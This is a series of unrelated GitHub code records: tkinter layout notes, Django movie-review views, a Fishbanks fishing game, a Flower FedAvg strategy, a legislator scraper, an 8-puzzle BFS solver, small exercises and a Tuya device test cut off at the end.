布局:它直接使用死板的位置坐标来布局,这样做的最大的问题在于当我们向窗口添加一个新部件的时候,又得重新测一遍数据,且\n我们不能随便地变大或者缩小窗口,否则,可能会导致混乱。\n**************pack 布局 *************\n1. 我们使用 pack 函数的时候,默认先使用的放到上面,然后 依次向下排,它会给我们的组件一个自认为合适的位置和大小,这是默认方式,\n也是我们上面一直采用的方式。\n2. pack 函数也可以接受几个参数, side 参数指定了它停靠在哪个方向,可以为 LEFT,TOP,RIGHT,BOTTOM, 分别代表左,上,右,下,它的 \nfill 参数可以是 X,Y,BOTH 和 NONE,即在水平方向填充,竖直方向填充,水平和竖直方向填充和不填充。\n3. 它的 expand 参数可以是 YES和 NO,它的 anchor 参数可以是 N,E,S,W(这里的 NESW分别表示北东南西,这里分别表示上右下左)以及\n他们的组合或者是 CENTER(表示中间)。\n4. 它的 ipadx 表示的是内边距的 x 方向,它的 ipady 表示的是内边距的 y 方向, padx 表示的是外边距的 x 方向,pady 表示的是外边距\n的 y 方向。\n**************grid 布局 *************\n1. 由于我们的程序大多数都是矩形,因此特别适合于网格布局,也就是 grid 布局。\n2. 使用 grid 布局的时候,我们使用 grid 函数,在里面指定两个参数,用 row 表示行,用 column 表示列,其中值得注意的是 row 和 column \n的编号都从 0 开始。\n3.grid 函数还有个 sticky 参数,它可以用 N, E, S, W表示上右下左,它决定了这个组件是从哪个方向开始的,下面的例子可以很好的解释这一点。\n4.grid 布局直接用后面的行和列的数字来指定了它位于哪个位置,而不必使用其他参数。\n5.grid 函数也支持诸如 ipadx , ipady , padx, pady,它们的意思和 pack 函数是一样的,默认边距是 0。\n6. 它还支持参数比如 rowspan ,表示跨越的行数,columnspan 表示跨越的列数。\n *************place 布局 *************\n1. 关于 place 布局,可能是最有东西好讲的,但是,也是我最不愿意讲的。\n2. 它使用 place 函数,它分为绝对布局和相对布局,绝对布局使用 x 和 y 参数,相对布局使用 relx , rely ,relheight 和 relwidth 参数。\n3. 由于该方法我极度不推荐大家用,因此也就不继续说了。\n*************** 总结 **************\n1. 由于 place 我不推荐大家用,也就 pack 和 grid 布局好一些。\n2. 但是 pack 和 grid 不能同时用,通常对于较为复杂点的,我还是建议大家用 gird 。\n''' \n","repo_name":"RJocket/lerning","sub_path":"day1_LoginBox.py","file_name":"day1_LoginBox.py","file_ext":"py","file_size_in_byte":5472,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40852429094","text":"from django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.db.models import Count, Q\nfrom django.http import JsonResponse\nfrom django.http.response import HttpResponse\nfrom django.shortcuts import redirect\nfrom django.urls.base import reverse, reverse_lazy\nfrom django.utils import timezone\nfrom django.views.generic import ListView, DetailView, FormView, TemplateView\nfrom django.views.generic.detail import SingleObjectMixin\nfrom django.views import View\n\nfrom .models import People, Genre, Movie, CastAndCrew, Review\nfrom .forms import ReviewForm\n\n\nclass MovieListView(ListView):\n\n model = Genre\n context_object_name = 'genre_list'\n template_name = 'movie_list.html'\n\n def get_queryset(self):\n\n return Genre.objects.annotate(review_count=Count('movies__reviews')).order_by('-review_count')[:10]\n\nclass GenreListView(ListView):\n\n model = Genre\n context_object_name = 'genre_list'\n template_name = 'genre_list.html'\n ordering = ['genre']\n\nclass GenreDetailView(DetailView):\n\n model = Genre\n context_object_name = 'genre'\n template_name = 'genre_detail.html'\n\nclass MovieDetailView(DetailView):\n\n model = Movie\n context_object_name = 'movie'\n template_name = 'movie_detail.html'\n\n def get_context_data(self, **kwargs): \n context = super(MovieDetailView, self).get_context_data(**kwargs)\n if self.request.user.is_authenticated:\n context['user_review'] = self.get_object().reviews.all().filter(author=self.request.user).first()\n context['review_form'] = ReviewForm()\n context['reviews'] = self.get_object().reviews.all().order_by('-date_posted')\n return context\n\nclass ReviewFormView(SingleObjectMixin, FormView):\n\n template_name = 'movie_detail.html'\n form_class = ReviewForm\n model = Movie\n\n def post(self, request, *args, **kwargs):\n \n if not request.user.is_authenticated:\n return HttpResponse('You must be logged in to review.')\n self.object = self.get_object()\n return super().post(request, *args, **kwargs)\n\n def form_valid(self, form):\n \n form.instance.author = self.request.user\n form.instance.movie = self.object\n form.save()\n return super().form_valid(form)\n\n def get_success_url(self):\n \n return reverse('movie_detail', args=[str(self.object.id)])\n\nclass MovieHybridView(View):\n\n def get(self, request, *args, **kwargs):\n \n view = MovieDetailView.as_view()\n return view(request, *args, **kwargs)\n\n def post(self, request, *args, **kwargs):\n \n view = ReviewFormView.as_view()\n return view(request, *args, **kwargs)\n\nclass PeopleDetailView(DetailView):\n\n model = People\n context_object_name = 'people'\n template_name = 'people_detail.html'\n\ndef fetch_get_search(request):\n\n movies = Movie.objects.annotate(review_count=Count('reviews')).order_by('-review_count')\n people = People.objects.all().order_by('name')\n genres = Genre.objects.all().order_by('genre')\n data = {\n 'movies': [],\n 'people': [],\n 'genres': []\n }\n for movie in movies:\n avg_review = movie.avg_review\n data['movies'].append({\n 'title': movie.title,\n 'link': movie.get_absolute_url(),\n 'cover': movie.cover.url,\n 'date_released': movie.date_released,\n 'avg_review': avg_review,\n 'movie_rated':movie.movie_rated,\n 'distribution_company':movie.distribution_company\n })\n for person in people:\n data['people'].append({\n 'name': person.name,\n 'link': person.get_absolute_url(),\n 'picture': person.picture.url,\n 'birth_date': person.birth_date,\n 'birth_place': person.birth_place\n })\n for genre in genres:\n data['genres'].append({\n 'genre': genre.genre,\n 'link': genre.get_absolute_url()\n })\n return JsonResponse(data)\n\nclass SearchView(TemplateView):\n\n template_name = 'search_list.html'\n\n def get_context_data(self, **kwargs):\n \n context = {}\n search = self.request.GET.get('search')\n context['search_string'] = search\n context['movie_list'] = Movie.objects.filter(\n Q(title__icontains=search) |\n Q(distribution_company__icontains=search) |\n Q(crew__person__name__icontains=search) |\n Q(crew__role__icontains=search) |\n Q(genre__genre__icontains=search)\n ).distinct().order_by('title')\n context['people_list'] = People.objects.filter(\n Q(name__icontains=search) |\n Q(roles__role__icontains=search) |\n Q(roles__movie__title__icontains=search)\n ).distinct().order_by('name')\n context['genre_list'] = Genre.objects.filter(\n Q(genre__icontains=search) |\n Q(movies__title__icontains=search)\n ).distinct().order_by('genre')\n return context\n\ndef fetch_get_reviews(request):\n\n reviews = Review.objects.all().filter(author=request.user)\n data = {\n 'reviews': []\n }\n for review in reviews:\n \n data['reviews'].append({\n 'id': review.id,\n 'title': review.title,\n 'movie': review.movie.title,\n 'viewer_rating': review.viewer_rating,\n 'comment': review.comment,\n 'date_posted': review.date_posted.strftime('%d %B %Y, %-I:%M %p'),\n })\n return JsonResponse(data)\n\nclass ReviewUpdateView(LoginRequiredMixin, TemplateView):\n\n def post(self, request, *args, **kwargs):\n\n review = Review.objects.filter(author=request.user, movie=request.POST['movie_id']).first()\n review.title = request.POST['title']\n review.viewer_rating = request.POST['user_viewer_rating'] if 'user_viewer_rating' in request.POST else 0\n review.comment = request.POST['comment']\n review.date_posted = timezone.now()\n review.save()\n return redirect('movie_detail', str(review.movie.id))\n\nclass ReviewDeleteView(LoginRequiredMixin, TemplateView):\n\n def post(self, request, *args, **kwargs):\n\n review = Review.objects.filter(author=request.user, movie=request.POST['movie_id']).first()\n review.delete()\n\n return redirect('movie_detail', str(review.movie.id))\n","repo_name":"andydandy21/movie_review_app","sub_path":"movies/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11536752541","text":"def main():\n l1=float(input(\"Digite o primeiro comprimento: \"))\n l2=float(input(\"Digite o segundo comprimento: \"))\n l3=float(input(\"Digite o terceiro comprimento: \"))\n calculo=determinar_triangulo(l1,l2,l3)\n if(calculo):\n print(\"Pode formar um triangulo\")\n else:\n print(\"Não pode formar um triangulo\")\n\ndef determinar_triangulo(l1,l2,l3):\n if (l1+l2)>l3:\n return False\n if(l2+l3)>l1:\n return False\n if(l1+l3)>l2:\n return False\n return True\n\nmain()","repo_name":"Gzanella1/BCC-Bacharelado-Ciencia-da-computacao","sub_path":"Algoritimos/ALG-Lista-5/GZM-ALM-05-EX-07.py","file_name":"GZM-ALM-05-EX-07.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"2832431774","text":"import random\nimport math\nimport time\nimport threading\n\nteam_name = input(\"Please enter your team name: \")\nfish_repo_rate = 100\nfish_in_lake = 0\n\n\ndef addFish():\n global fish_in_lake\n threading.Timer(10.0, addFish).start() # called every minute\n fish_in_lake += fish_repo_rate\n\naddFish()\n\n\nclass fishBanks:\n def __init__(self, teamName):\n self.teamName = teamName\n self.balance = 500\n self.shipLevel = 1\n self.boost_ship_lv = 1\n self.waitTime = 8\n self.pricePerFish = 6.25\n self.pricePerShip = 18.75\n self.revenue = 100 - (self.pricePerFish + self.pricePerShip)\n self.shipUpgradeCost = 50\n self.maxShipsSent = 5\n self.fishCaptureAmount = 75\n self.fish_repo_rate = fish_repo_rate\n self.fleet_num = 1\n self.netWorth = 0\n\n def send_ships(self):\n global fish_in_lake\n fish_in_lake -= self.fishCaptureAmount\n\n if fish_in_lake <= 0:\n print(\"All fish have been captured, please wait for more.\")\n return\n\n if self.balance < 0:\n print(\"Note: You are now in debt by \" + \"$\", str(self.balance))\n\n if self.maxShipsSent > self.fleet_num:\n self.revenue *= self.fleet_num\n\n elif self.maxShipsSent < self.fleet_num:\n self.revenue *= self.maxShipsSent\n\n print(\"You have $\", str(self.balance), \"in your account\")\n print(\"sending max amount of level\", self.shipLevel, \"ships(s)...\") # sends ships\n time.sleep(self.waitTime) # wait time depending on the level of ship\n self.balance += self.revenue # paycheck\n print(\"$\", str(self.balance), \"In your account. You made \" + str(self.revenue) + \"\\n\")\n\n tip_chance = random.randint(1, 2) # helpful tips\n if tip_chance == 2 and self.shipLevel == 1:\n print(\"Tired of waiting? upgrade your ships buy typing 'boost tech'\")\n\n def buy_ships(self):\n quantity = int(input(\"Enter how many level \" + str(self.shipLevel) + \" ship(s) to buy: \"))\n print(\"The total cost for your \" + str(quantity) + \" level\" + str(self.shipLevel) + \" ship(s) is \" +\n str(self.shipUpgradeCost * quantity))\n\n confirm = input(\"Are you sure you want to continue? (y/n): \")\n if confirm == \"y\".lower():\n self.balance -= self.shipUpgradeCost * quantity\n self.fleet_num += quantity\n print(\"Sucessfully purchased: \" + str(quantity) + \" level\" + str(self.shipLevel) + \" ship(s)\")\n else:\n return\n\n def sell_ships(self):\n quantity = int(input(\"Enter how many ships to sell: \"))\n returned_cash = quantity * math.floor(self.shipUpgradeCost / 2) - self.balance\n print(\"+\", str(returned_cash) + \" added to your account\")\n print(\"Your bank balance is $\" + str(self.balance + returned_cash))\n\n def boost_tech(self):\n self.shipLevel += 1\n if self.shipLevel == 1:\n self.waitTime = 8\n self.pricePerFish = 6.25\n self.pricePerShip = 18.75\n self.revenue = 100 - (self.pricePerFish + self.pricePerShip)\n self.shipUpgradeCost = 50\n self.maxShipsSent = 5\n self.fishCaptureAmount = 75\n self.fish_repo_rate = 500\n self.netWorth = self.balance + (self.pricePerShip * self.fleet_num)\n\n if self.shipLevel == 2:\n self.waitTime = 5\n self.pricePerFish = 12.5\n self.pricePerShip = 37.5\n self.revenue = 200 - (self.pricePerFish + self.pricePerShip)\n self.shipUpgradeCost = 325\n self.maxShipsSent = 15\n self.fishCaptureAmount = 100\n self.fish_repo_rate = 600\n self.netWorth = self.balance + (self.pricePerShip * self.fleet_num)\n\n if self.shipLevel == 3:\n self.waitTime = 4\n self.pricePerFish = 25\n self.pricePerShip = 150\n self.revenue = 300 - (self.pricePerFish + self.pricePerShip)\n self.shipUpgradeCost = 550\n self.maxShipsSent = 25\n self.fishCaptureAmount = 150\n self.fish_repo_rate = 700\n self.netWorth = self.balance + (self.pricePerShip * self.fleet_num)\n\n if self.shipLevel == 4:\n self.waitTime = 3\n self.pricePerFish = 31.25\n self.pricePerShip = 93.75\n self.revenue = 400 - (self.pricePerFish + self.pricePerShip)\n self.shipUpgradeCost = 775\n self.maxShipsSent = 35\n self.fishCaptureAmount = 200\n self.fish_repo_rate = 800\n self.netWorth = self.balance + (self.pricePerShip * self.fleet_num)\n\n if self.shipLevel == 5:\n self.waitTime = 2\n self.pricePerFish = 37.5\n self.pricePerShip = 112.5\n self.revenue = 500 - (self.pricePerFish + self.pricePerShip)\n self.shipUpgradeCost = 1000\n self.maxShipsSent = 45\n self.fishCaptureAmount = 250\n self.fish_repo_rate = 1000\n self.netWorth = self.balance + (self.pricePerShip * self.fleet_num)\n\n if self.balance - self.pricePerShip < 0:\n print(\"Unable to proceed with your request. you need \")\n self.shipLevel -= 1\n return\n\n else:\n\n print(\"Ships boosted to level \" + str(self.shipLevel), \"$\" + str(self.shipUpgradeCost) +\n \" deducted from your account, your balance is $\", str(self.balance - self.shipUpgradeCost))\n self.balance -= self.shipUpgradeCost\n\n print(\"Fish reproduction is now at \" + str(self.fish_repo_rate + 100), \"fish every 10s.\")\n\n\nt1 = fishBanks(team_name)\n\nwhile True:\n print()\n usr_in = input(\"- \")\n if usr_in == \"send ships\".lower():\n t1.send_ships()\n\n if usr_in == \"buy ships\".lower():\n t1.buy_ships()\n\n if usr_in == \"sell ships\".lower():\n t1.sell_ships()\n\n if usr_in == \"boost tech\".lower():\n t1.boost_tech()\n\n if usr_in == \"balance\".lower():\n print(t1.balance)\n\n if usr_in == \"ship num\".lower():\n print(t1.fleet_num)\n\n if usr_in == \"\".lower():\n print(\"\\n\" * 100)\n\n if usr_in == \"fish num\".lower():\n print(fish_in_lake)\n\n if usr_in == \"frr\".lower():\n print(t1.fish_repo_rate)\n\n if usr_in == \"net worth\".lower():\n print(t1.netWorth)\n","repo_name":"Jacob406/Fishbanks-simulation","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38064962262","text":"import os\nimport flwr\nimport numpy as np\nfrom veremi.config import Config\nfrom flwr.server.strategy.fedavg import FedAvg\nfrom flwr.server.client_proxy import ClientProxy\nfrom typing import List, Tuple, Union, Optional, Dict, Callable\n\nfrom flwr.common import FitRes, Scalar, Parameters, MetricsAggregationFn, NDArrays\n\n\nclass VeremiFedAvg(FedAvg):\n\n # pylint: disable=too-many-arguments,too-many-instance-attributes\n def __init__(\n self,\n *,\n fraction_fit: float = 1.0,\n fraction_evaluate: float = 1.0,\n min_fit_clients: int = 2,\n min_evaluate_clients: int = 2,\n min_available_clients: int = 2, evaluate_fn: Optional[\n Callable[\n [int, NDArrays, Dict[str, Scalar]],\n Optional[Tuple[float, Dict[str, Scalar]]],\n ]\n ] = None,\n on_fit_config_fn: Optional[Callable[[int], Dict[str, Scalar]]] = None,\n on_evaluate_config_fn: Optional[Callable[[int], Dict[str, Scalar]]] = None,\n accept_failures: bool = True, initial_parameters: Optional[Parameters] = None,\n fit_metrics_aggregation_fn: Optional[MetricsAggregationFn] = None,\n evaluate_metrics_aggregation_fn: Optional[MetricsAggregationFn] = None,\n output_path: str = \"\"\n ) -> None:\n\n \"\"\"VeReMi Federated Averaging Strategy.\n\n Parameters\n ----------\n fraction_fit : float, optional\n Fraction of clients used during training. Defaults to 0.1.\n fraction_evaluate : float, optional\n Fraction of clients used during validation. Defaults to 0.1.\n min_fit_clients : int, optional\n Minimum number of clients used during training. Defaults to 2.\n min_evaluate_clients : int, optional\n Minimum number of clients used during validation. Defaults to 2.\n min_available_clients : int, optional\n Minimum number of total clients in the system. Defaults to 2.\n evaluate_fn : Optional[\n Callable[\n [int, NDArrays, Dict[str, Scalar]],\n Optional[Tuple[float, Dict[str, Scalar]]]\n ]\n ]\n Optional function used for validation. Defaults to None.\n on_fit_config_fn : Callable[[int], Dict[str, Scalar]], optional\n Function used to configure training. Defaults to None.\n on_evaluate_config_fn : Callable[[int], Dict[str, Scalar]], optional\n Function used to configure validation. Defaults to None.\n accept_failures : bool, optional\n Whether or not accept rounds containing failures. Defaults to True.\n initial_parameters : Parameters, optional\n Initial global model parameters.\n fit_metrics_aggregation_fn: Optional[MetricsAggregationFn]\n Metrics aggregation function, optional.\n evaluate_metrics_aggregation_fn: Optional[MetricsAggregationFn]\n Metrics aggregation function, optional.\n \"\"\"\n\n super().__init__(fraction_fit=fraction_fit, fraction_evaluate=fraction_evaluate,\n min_fit_clients=min_fit_clients, min_evaluate_clients=min_evaluate_clients,\n min_available_clients=min_available_clients, evaluate_fn=evaluate_fn,\n on_fit_config_fn=on_fit_config_fn, on_evaluate_config_fn=on_evaluate_config_fn,\n accept_failures=accept_failures, initial_parameters=initial_parameters,\n fit_metrics_aggregation_fn=fit_metrics_aggregation_fn,\n evaluate_metrics_aggregation_fn=evaluate_metrics_aggregation_fn)\n\n self.output_path = output_path\n self.load_data()\n self.params = None\n\n def load_data(self):\n if self.initial_parameters is None:\n file = self.output_path + Config.weights_file\n if os.path.exists(file):\n npzfile = np.load(file)\n params = [npzfile[x] for x in npzfile]\n params = flwr.common.ndarrays_to_parameters(params)\n self.initial_parameters = params\n\n def aggregate_fit(\n self,\n server_round: int,\n results: List[Tuple[flwr.server.client_proxy.ClientProxy, flwr.common.FitRes]],\n failures: List[Union[Tuple[ClientProxy, FitRes], BaseException]],\n ) -> Tuple[Optional[Parameters], Dict[str, Scalar]]:\n aggregated_parameters, aggregated_metrics = super().aggregate_fit(server_round, results, failures)\n\n if aggregated_parameters is not None:\n # Convert `Parameters` to `List[np.ndarray]`\n aggregated_ndarrays: List[np.ndarray] = flwr.common.parameters_to_ndarrays(aggregated_parameters)\n self.params = aggregated_ndarrays\n\n return aggregated_parameters, aggregated_metrics\n\n def save_params(self):\n np.savez(f\"{self.output_path}{Config.weights_file}\", *self.params)\n","repo_name":"c2dc/fl-ieee-vtc2023","sub_path":"veremi_fedavg.py","file_name":"veremi_fedavg.py","file_ext":"py","file_size_in_byte":5000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6397117557","text":"#!/usr/bin/env python\n\"\"\"Setup module for infinitewarp_utils.\"\"\"\nfrom datetime import datetime\n\nfrom setuptools import find_packages, setup\n\nbuild_time = datetime.utcnow().strftime('%Y%m%d%H%M%S')\n\nsetup(\n name='infinitewarp_utils',\n version='1.0.{}'.format(build_time),\n description='infinitewarp_utils is a collection of Python helper modules '\n 'for infinitewarp.',\n url='https://github.com/infinitewarp/infinitewarp-python-utils',\n author='Brad Smith',\n author_email='bradster@infinitewarp.com',\n license='MIT',\n packages=find_packages(exclude=['docs', 'tests', 'tests.*']),\n install_requires=[],\n dependency_links=[],\n zip_safe=True,\n)\n","repo_name":"infinitewarp/infinitewarp-python-utils","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7151979975","text":"\"\"\"pm42 URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/4.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import include, path\nfrom .views import Init, Dev, ApiLogin, ApiRank, ApiSlot, ApiSlotMe\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('', Init.as_view()),\n #path('', Dev.as_view()),\n path('api/login/', ApiLogin.as_view()),\n path('api/rank/', ApiRank.as_view()),\n path('api/slot/me/', ApiSlotMe.as_view()),\n path('api/slot/', ApiSlot.as_view()),\n #path('api/slot/all/', ApiSlot.as_view()),\n #path('api/me/', ApiMe.as_view()),\n]\n","repo_name":"bok000111/42hackathon","sub_path":"pm42/pm42/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29837809767","text":"import re\n\nfrom fiftystates.scrape import NoDataForPeriod\nfrom fiftystates.scrape.legislators import LegislatorScraper, Legislator\n\nimport lxml.html\n\n\nclass FLLegislatorScraper(LegislatorScraper):\n state = 'fl'\n\n def scrape(self, chamber, term):\n if term != '2010':\n raise NoDataForPeriod(term)\n\n if chamber == 'upper':\n self.scrape_senators(term)\n else:\n self.scrape_reps(term)\n\n def scrape_senators(self, term):\n url = (\"http://www.flsenate.gov/Legislators/\"\n \"index.cfm?Mode=Member%20Pages&Submenu=1&Tab=legislators\")\n\n with self.urlopen(url) as page:\n page = lxml.html.fromstring(page)\n\n for link in page.xpath(\"//a[contains(@href, '/legislators')]\"):\n name = re.sub(r\"\\s+\", \" \", link.text).strip()\n\n # Special case - name_tools gets confused\n # by 'JD', thinking it is a suffix instead of a first name\n if name == 'Alexander, JD':\n name = 'JD Alexander'\n elif name == 'Vacant':\n name = 'Vacant Seat'\n\n district = link.xpath('string(../../td[2])').strip()\n party = link.xpath('string(../../td[3])').strip()\n\n leg = Legislator(term, 'upper', district, name,\n party=party)\n leg.add_source(url)\n self.save_legislator(leg)\n\n def scrape_reps(self, term):\n url = (\"http://www.flhouse.gov/Sections/Representatives/\"\n \"representatives.aspx\")\n\n with self.urlopen(url) as page:\n page = lxml.html.fromstring(page.decode('utf8'))\n\n for link in page.xpath(\"//a[contains(@href, 'MemberId')]\"):\n name = re.sub(r\"\\s+\", \" \", link.text).strip()\n\n party = link.xpath('string(../../td[3])').strip()\n if party == 'D':\n party = 'Democrat'\n elif party == 'R':\n party = 'Republican'\n\n district = link.xpath('string(../../td[4])').strip()\n\n leg = Legislator(term, 'lower', district, name,\n party=party)\n leg.add_source(url)\n self.save_legislator(leg)\n","repo_name":"runderwood/fiftystates","sub_path":"fiftystates/scrape/fl/legislators.py","file_name":"legislators.py","file_ext":"py","file_size_in_byte":2306,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"71187728514","text":"import queue\r\n\r\ndef Path_search(mp, init_pos, now_pos, empty):\r\n '''输出路径\r\n \r\n '''\r\n father = ''\r\n child = now_pos\r\n path = []\r\n i = 0\r\n while(child != init_pos):\r\n father = mp.get(child)\r\n father_empty = get_empty_pos(father, empty)\r\n child_empty = get_empty_pos(child, empty)\r\n count = father_empty - child_empty\r\n if count == -3:\r\n path.append('s')\r\n elif count == -1:\r\n path.append('d')\r\n elif count == 1:\r\n path.append('a')\r\n elif count == 3:\r\n path.append('w')\r\n child = father\r\n return list(reversed(path))\r\n\r\n\r\ndef Solvable(now_pos, empty):\r\n ''' 判断有无解\r\n 通过计算逆序数,偶序列有解,奇序列无解\r\n '''\r\n lenght = 9\r\n count = 0\r\n for i in range(lenght-1):\r\n if now_pos[i] == empty:\r\n continue\r\n for j in range(i+1, lenght):\r\n if now_pos[j] == empty:\r\n continue\r\n if now_pos[i] > now_pos[j]:\r\n count += 1\r\n if count % 2 == 0:\r\n return True\r\n else:\r\n return False\r\n\r\n\r\ndef get_empty_pos(now_pos, empty):\r\n '''遍历找出空白位置'''\r\n for i in range(len(now_pos)):\r\n if now_pos[i] == empty:\r\n return i\r\n \r\ndef bfs(init_pos, empty):\r\n ''' 核心算法\r\n 通过广搜找出最优解\r\n '''\r\n dir = [2, 3, 2, 3, 4, 3, 2, 3, 2]\r\n dis = [[1, 3], [0, 2, 4], [1, 5], [0, 4, 6], [\r\n 1, 3, 5, 7], [2, 4, 8], [3, 7], [4, 6, 8], [5, 7]]\r\n mp = {}\r\n q1 = queue.Queue() # 储存序列信息\r\n q2 = queue.Queue() # 储存步数\r\n q1.put(init_pos)\r\n q2.put(0)\r\n\r\n while(not q1.empty()):\r\n father_pos = q1.get()\r\n step = q2.get()\r\n pos = get_empty_pos(father_pos, empty)\r\n if father_pos == '123456789':\r\n return Path_search(mp,init_pos, father_pos,empty)\r\n for i in range(dir[pos]):\r\n child_pos = list(father_pos)\r\n child_pos[pos], child_pos[dis[pos][i]] = child_pos[dis[pos][i]], child_pos[pos] # 移动空白\r\n child_pos = ''.join(child_pos)\r\n if child_pos not in mp: # 重复标记\r\n mp[child_pos] = father_pos \r\n elif child_pos in mp:\r\n continue\r\n q1.put(child_pos)\r\n q2.put(step+1)","repo_name":"Zhlod/Huarong_Road","sub_path":"Game/AI_Move.py","file_name":"AI_Move.py","file_ext":"py","file_size_in_byte":2390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15332783699","text":"\"\"\"Tests for the switch entity.\"\"\"\r\nfrom homeassistant.components.sensor import SensorDeviceClass\r\nfrom homeassistant.components.switch import SwitchDeviceClass\r\nfrom homeassistant.const import (\r\n UnitOfElectricCurrent,\r\n UnitOfElectricPotential,\r\n UnitOfEnergy,\r\n UnitOfPower,\r\n UnitOfTime,\r\n)\r\n\r\nfrom ..const import GRIDCONNECT_2SOCKET_PAYLOAD\r\nfrom ..mixins.lock import BasicLockTests\r\nfrom ..mixins.number import MultiNumberTests\r\nfrom ..mixins.select import BasicSelectTests\r\nfrom ..mixins.sensor import MultiSensorTests\r\nfrom ..mixins.switch import MultiSwitchTests\r\nfrom .base_device_tests import TuyaDeviceTestCase\r\n\r\nSWITCH1_DPS = \"1\"\r\nSWITCH2_DPS = \"2\"\r\nCOUNTDOWN1_DPS = \"9\"\r\nCOUNTDOWN2_DPS = \"10\"\r\nENERGY_DPS = \"17\"\r\nCURRENT_DPS = \"18\"\r\nPOWER_DPS = \"19\"\r\nVOLTAGE_DPS = \"20\"\r\nTEST_DPS = \"21\"\r\nCALIBV_DPS = \"22\"\r\nCALIBA_DPS = \"23\"\r\nCALIBW_DPS = \"24\"\r\nCALIBE_DPS = \"25\"\r\nINITIAL_DPS = \"38\"\r\nLOCK_DPS = \"40\"\r\nMASTER_DPS = \"101\"\r\n\r\n\r\nclass TestGridConnectDoubleSwitch(\r\n BasicLockTests,\r\n BasicSelectTests,\r\n MultiNumberTests,\r\n MultiSensorTests,\r\n MultiSwitchTests,\r\n TuyaDeviceTestCase,\r\n):\r\n __test__ = True\r\n\r\n def setUp(self):\r\n self.setUpForConfig(\r\n \"grid_connect_usb_double_power_point.yaml\",\r\n GRIDCONNECT_2SOCKET_PAYLOAD,\r\n )\r\n self.setUpBasicLock(LOCK_DPS, self.entities.get(\"lock_child_lock\"))\r\n self.setUpBasicSelect(\r\n INITIAL_DPS,\r\n self.entities.get(\"select_initial_state\"),\r\n {\r\n \"on\": \"On\",\r\n \"off\": \"Off\",\r\n \"memory\": \"Last State\",\r\n },\r\n )\r\n # Master switch must go last, otherwise its tests interfere with\r\n # the tests for the other switches since it overrides them.\r\n # Tests for the specific override behaviour are below.\r\n self.setUpMultiSwitch(\r\n [\r\n {\r\n \"name\": \"switch_outlet_1\",\r\n \"dps\": SWITCH1_DPS,\r\n \"device_class\": SwitchDeviceClass.OUTLET,\r\n },\r\n {\r\n \"name\": \"switch_outlet_2\",\r\n \"dps\": SWITCH2_DPS,\r\n \"device_class\": SwitchDeviceClass.OUTLET,\r\n },\r\n {\r\n \"name\": \"switch_master\",\r\n \"dps\": MASTER_DPS,\r\n \"device_class\": SwitchDeviceClass.OUTLET,\r\n },\r\n ]\r\n )\r\n self.setUpMultiSensors(\r\n [\r\n {\r\n \"name\": \"sensor_energy\",\r\n \"dps\": ENERGY_DPS,\r\n \"unit\": UnitOfEnergy.WATT_HOUR,\r\n },\r\n {\r\n \"name\": \"sensor_current\",\r\n \"dps\": CURRENT_DPS,\r\n \"device_class\": SensorDeviceClass.CURRENT,\r\n \"unit\": UnitOfElectricCurrent.MILLIAMPERE,\r\n \"state_class\": \"measurement\",\r\n },\r\n {\r\n \"name\": \"sensor_power\",\r\n \"dps\": POWER_DPS,\r\n \"device_class\": SensorDeviceClass.POWER,\r\n \"unit\": UnitOfPower.WATT,\r\n \"state_class\": \"measurement\",\r\n \"testdata\": (1234, 123.4),\r\n },\r\n {\r\n \"name\": \"sensor_voltage\",\r\n \"dps\": VOLTAGE_DPS,\r\n \"device_class\": SensorDeviceClass.VOLTAGE,\r\n \"unit\": UnitOfElectricPotential.VOLT,\r\n \"state_class\": \"measurement\",\r\n \"testdata\": (2345, 234.5),\r\n },\r\n ]\r\n )\r\n self.setUpMultiNumber(\r\n [\r\n {\r\n \"name\": \"number_timer_1\",\r\n \"dps\": COUNTDOWN1_DPS,\r\n \"max\": 86400,\r\n \"unit\": UnitOfTime.SECONDS,\r\n },\r\n {\r\n \"name\": \"number_timer_2\",\r\n \"dps\": COUNTDOWN2_DPS,\r\n \"max\": 86400,\r\n \"unit\": UnitOfTime.SECONDS,\r\n },\r\n ]\r\n )\r\n self.mark_secondary(\r\n [\r\n \"lock_child_lock\",\r\n \"number_timer_1\",\r\n \"number_timer_2\",\r\n \"select_initial_state\",\r\n \"switch_master\",\r\n \"sensor_energy\",\r\n \"sensor_current\",\r\n \"sensor_power\",\r\n \"sensor_voltage\",\r\n ],\r\n )\r\n\r\n # Since we have attributes, override the default test which expects none.\r\n def test_multi_switch_state_attributes(self):\r\n self.dps[TEST_DPS] = 21\r\n self.assertDictEqual(\r\n self.multiSwitch[\"switch_master\"].extra_state_attributes,\r\n {\r\n \"test_bit\": 21,\r\n },\r\n )\r\n\r\n def test_multi_sensor_extra_state_attributes(self):\r\n self.dps[CALIBA_DPS] = 1\r\n self.dps[CALIBE_DPS] = 